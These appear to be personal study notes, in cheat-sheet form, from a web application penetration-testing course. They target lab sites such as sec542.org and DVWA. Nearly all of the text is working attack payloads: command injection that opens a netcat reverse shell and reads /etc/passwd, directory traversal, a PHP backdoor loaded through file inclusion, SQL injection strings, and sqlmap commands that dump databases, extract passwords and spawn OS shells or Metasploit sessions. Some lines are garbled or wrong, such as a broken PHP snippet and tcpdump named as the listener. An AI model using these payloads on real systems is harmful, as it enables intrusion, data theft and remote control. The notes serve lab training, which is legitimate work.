## Authentication bypass on BASE (3.30) #build out this exploit.html file
## COMMAND INJECTION # find vulnerable form or URL sec542.org search; cat /etc/passwd ## the semi-colon ends the first statement and executes the second # silently test with ping sec542.org search; ping -c3 127.0.0.1 ## ping 3x, have tcpdump running # have a reverse backdoor shell connect to our NC sec542.org search; nc 127.0.0.1 1337 -e /bin/bash ## -e execute cmd which is a shell ## TCPDUMP for inject sudo tcpdump -ni any icmp[icmptype]=icmp-echo ## -n don't resolve names. -i any interface. filtering on icmp only ## Netcat listener for reverse backdoor tcpdump -lvvnp 1337 ## -l listen. -vv very verbose. -n no dns resolve. -p port ## DIRECTORY TRAVERSAL http://sec542.org/scripts/../../winnt/system32/cmd.exe+/c+dir sec542.org/scripts/../../etc/passwd%00 ## Adding %00 can act as NULL which ends syntax mutillidae/index.php?page=/etc/passwd ## Quick PHP Shell, still have to upload to target. replace command with an actual command ex: id '); ?> OR as a single line echo shell_exec(''); ?> ## Backdoor PHP as shell.txt ## Run backdoor through another device http://example.org/index.php?page=http://127.0.0.1/shell.txt then nc 127.0.0.1 4242 ## SQL INJECTION syntax. cheatsheets Dent ' '*' Dent' OR '1'='1 Dent' OR 1=1;# ## the semi-colon ends the SQL statement and # comments out the remaining SQL in the backend ## SQLI Identify columns Dent' ORDER BY 1;# ## Keep repeating until you get an error; this gives you the number of columns in the table Dent' ORDER BY 2;# ## SQLI Query Dent' UNION SELECT '1','2','3','4';# Dent' UNION SELECT '1','2','3','4', info FROM information_schema.processlist;# ## SQLMAP sqlmap -u http://www.sec542.org/scanners/sqli.php?name=Zaphod --file-read=/etc/passwd sqlmap -u http://www.sec542.org/ --crawl # crawls the site looking for entry points sqlmap -u http://www.sec542.org/ --forms # targets web forms sqlmap --proxy # ride with ZAP/Burp.
(3.159) sqlmap -u http://www.sec542.org/scanners/sqli.php?name=Zaphod --dump-all # DUMP IT sqlmap -u http://www.sec542.org/scanners/sqli.php?name=Zaphod --search password --tables --users # show DB user accounts --passwords # show passwords --priv-esc # escalate privs --os-cmd --os-shell --os-pwn #metasploit sqlmap -u "http://dvwa/vuln/sqli/id?=1&Submit=Submit" --cookie="23423x" --proxy http://localhost:8081 --batch --user-agent mozilla # Count customers column in sqli database syntax: sqlmap -u "http://dvwa/vuln/sqli/id?=1&Submit=Submit" --cookie="23423x" --proxy http://localhost:8081 --batch --user-agent mozilla -D sqli -T Customers --Count # READ A FILE sqlmap -u "http://dvwa/vuln/sqli/id?=1&Submit=Submit" --cookie="23423x" --proxy http://localhost:8081 --batch --user-agent mozilla --file-read /etc/passwd # Search sqlmap -u "http://dvwa/vuln/sqli/id?=1&Submit=Submit" --cookie="23423x" --proxy http://localhost:8081 --batch --user-agent mozilla --search -d wiki -C pass # METASPLOIT sqlmap -u "http://dvwa/vuln/sqli/id?=1&Submit=Submit" --cookie="23423x" --proxy http://localhost:8081 --batch --user-agent mozilla --os-pwn --msf-path /opt/metasploit-framework